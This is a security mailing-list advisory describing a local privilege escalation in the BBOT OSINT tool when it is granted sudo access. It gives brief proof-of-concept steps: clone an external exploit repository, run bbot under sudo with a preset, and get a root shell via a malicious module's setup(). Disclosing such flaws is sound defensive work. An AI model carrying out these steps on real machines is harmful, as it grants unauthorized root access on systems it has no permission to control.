[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAGp_9Zh7b47xzkE_SfH=rTYeu-RCQTx1qG8Y=Fg8GC7-nDHHvA@mail.gmail.com>
Date: Fri, 18 Apr 2025 16:12:49 +0400
From: Housma mardini <housma@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] BBOT 2.1.0 - Local Privilege Escalation via Malicious Module
Execution
Hi Full Disclosure,
I'd like to share a local privilege escalation technique involving BBOT
(Bighuge BLS OSINT Tool) when misconfigured with sudo access.
---
Exploit Title: BBOT 2.1.0 - Local Privilege Escalation via Malicious Module
Execution
Date: 2025-04-16
Exploit Author: Huseyin Mardinli
Vendor Homepage: https://github.com/blacklanternsecurity/bbot
Version: 2.1.0.4939rc (tested)
Tested on: Kali Linux Rolling (2025.1)
CVE: N/A
Platform: Linux
Type: Local
### Description:
BBOT allows execution of custom Python modules during OSINT scans. When
configured as a sudo-executable (e.g., via NOPASSWD), a malicious module
can escalate privileges via the `setup()` function.
### PoC Steps:
1. Clone:
git clone https://github.com/Housma/bbot-privesc.git
2. Run with sudo:
sudo /usr/local/bin/bbot -t dummy.com -p preset.yml --event-types ROOT
3. A root shell is spawned via `bash -p` from within the module.
### GitHub (Full Write-up + PoC):
https://github.com/Housma/bbot-privesc
---
This exploit highlights how trusted open-source tools can be abused in
real-world environments.
Regards,
Huseyin Mardinli
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists